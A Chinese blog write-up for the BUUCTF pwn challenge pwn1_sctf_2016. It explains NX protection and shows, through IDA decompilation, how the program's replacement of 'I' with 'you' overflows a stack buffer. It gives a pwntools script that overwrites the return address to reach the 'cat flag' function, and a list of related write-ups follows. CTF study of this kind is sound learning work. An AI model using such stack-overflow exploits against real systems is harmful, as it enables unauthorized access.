[buuctf]pwn1_sctf_2016

已于 2022-05-31 00:25:28 修改
阅读量1.4k 收藏 6
点赞数 1
分类专栏: PWN # buuctf 文章标签: 安全 其他 python c++
于 2022-05-30 00:38:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125038133
版权
buuctf 同时被 2 个专栏收录
32 篇文章 0 订阅
订阅专栏
PWN
30 篇文章 2 订阅
订阅专栏

知识备用:

什么是NX:

NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。

总而言之,是一种保护的机制,我不能直接栈里面运行了。

解题思路:

查保护:

利用checksec进行查一下保护

 其他的保护会在以后做题中遇到,我会再说。

找逻辑:

放入IDA中查找逻辑,发现这是一个C++的文件,所以反编译出来,也是C++的语言,之后查找字符串,找到敏感的位置。

cat flag是一个敏感的位置,说明这里是调用了system的,所以我们看一下所在的位置 

可以找到这里,之后记住一下地址,之后我们去看输入的地方,有什么漏洞的存在,寻找问题 同样是字符串窗口下,可以看见一个大概提示的地方,让你输入什么。

之后找到了,之后双击,之后交叉引用到了汇编的位置反编译,之后点击vuln,你会发现反编译出来的c++源代码,也就下图

 看着不舒服,把重要的挑出来看看。

	printf("Tell me something about yourself: ");
	fgets(&s, 32, edata);
	std::string::string((int)&v5, (int)"you", (int)&v6);//v5-v6写入you
	std::string::string((int)&v7, (int)"I", (int)&v8);//v7-v8写入I
	replace((std::string*)&v4, (std::string*)&input, (std::string*)&v7);//输入的I变成you
	std::string::operator=(&input, &v4, v0, &v5);
	strcpy(&s, v1);//对比&s和v1,之后输出&s
	return printf("So, %s\n", &s);

从&s开始入手,点进去&s位置在0x3C加上返回地址+4,所以需要输入0x3C+4个数的值,但是,最多可以输出31个字节的位置,或者是读取到了换行符,所以要从转换开始一个I可以转换成三个字节来算需要21个I和一个随机的字符即可到达,之后返回到cat flag的位置,那么脚本成立。

pwndbg编写:

from pwn import *
ip = ip地址
port = 端口
p = process('./pwn1_sctf_2016')#本机
p = remote(ip,port)#远程
pl = b'I'*21+b'q' + p32(0x8048f0D)
p.sendline(pl)
p.interactive()

本机测试:

远程测试:

逆向萌新
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf pwn1_sctf_2016
wp568的博客
10-05 219
看到有.‘rodata:0000000000400684 00000008 C /bin/sh’,点进去看。read()并没有限制输入,显然存在栈溢出漏洞。存在后门函数,函数起始位置400596。拖入IDA,shift+F12查看。
BUUCTF pwn1_sctf_2016
CHAWUCIREN1的博客
04-08 3401
执行一下 似乎出现第一个i被替换成you 检查一下保护机制 丢到ida里面 输入的变量s大小为0x3c,但是我们看fgets里面,我们只能输入32个字符,没法进行溢出, 我们在输入的时候,会发现i会被替换成you,所以我们可以利用20个i来填充, 找到shell,地址为0x8048F0D 返回地址再随便填四个字符 我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p
Buuctf pwn1_sctf_2016
qq_53809201的博客
03-19 451
checksec run ida 在程序中搜索既没有system又没有bin/sh,所以明显的rop nptr处可以使用整数溢出构造rop 然后可以利用printf函数来泄露程序的libc版本 覆盖返回地址执行system来getshell exp from pwn import * from LibcSearcher import * context(os = 'linux', arch = 'i386', log_level = 'debug') elf = ELF("./pwn2") loca
[每日一PWN]BUUCTF pwn1_sctf_2016
qq_55233040的博客
11-22 257
本题是利用字符替换达成溢出。
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1289
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
buuctfpwn1_sctf_2016
weixin_54452942的博客
03-27 659
简单易懂~
BUUCTF|PWN-pwn1_sctf_2016
Rt1Text的博客
04-23 584
1.checksec+运行 32位+NX保护
[BUUCTF]——pwn1_sctf_2016
m0_68381884的博客
03-28 494
拿到文件先检查一下 得出结论这是32位程序且开启了nx保护。 用32位ida打开文件,并使用ida分析,看到较为敏感的“get flag” 双击跟进,找到函数后按F5将其反编译得到我们熟悉的伪代码 看到这个函数的作用就是输出“flag.txt”里的内容,记一下地址flag_addr=08048F0D 进入main函数 双击 vuln 函数, 0x02 编写exp: from pwn import* r=remote("redirect.do-not-trust.h.
Buu CTF PWN pwn1_sctf_2016 WriteUp
m0sway的博客
03-01 299
Buu CTF PWNpwn1_sctf_2016的WriteUp
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
1. C语言源代码:这部分代码可能负责设置定时器参数、初始化PWM接口以及根据应用需求调整占空比。 2. ARM7汇编代码:可能包括更底层的定时器控制和中断处理函数,这些函数可能直接操作硬件寄存器以实现PWM功能。 ...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
1. "PWN.c":这很可能是 AVR 单片机的 C 语言源代码,实现了 PWM 输出功能。我们可以预期代码中包含了初始化 PWM 定时器、设置 PWM 配置、以及可能的 PWM 寄存器操作等内容。 2. "www.pudn.com.txt":这个文件可能是...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 643
轻量部署,安全和业务连续性才能两不误
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 241
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
内网安全:IPC横向
最新发布
8888的博客
07-23 654
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
从等保测评看行业安全趋势:洞察与预测
A526847的博客
07-23 650
从等保1.0到等保2.0,我们看到了保护范围的扩展、综合防御体系的构建、定级灵活性的增强以及定级流程的严格化。未来,随着新技术的不断涌现,等保测评的标准和方法还将继续更新和完善。云计算、物联网、大数据等新兴领域的发展,为等保测评提供了新的应用场景。因此,等保测评需要面向这些新兴领域,制定专门的测评标准和方法,确保其安全性得到有效保障。企业需要组建专业的测评团队,并对其进行必要的培训,以确保测评的准确性和有效性。等保测评将更加注重对新技术的评估和应用,确保新技术在提升系统安全性的同时,不会带来新的安全隐患。
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值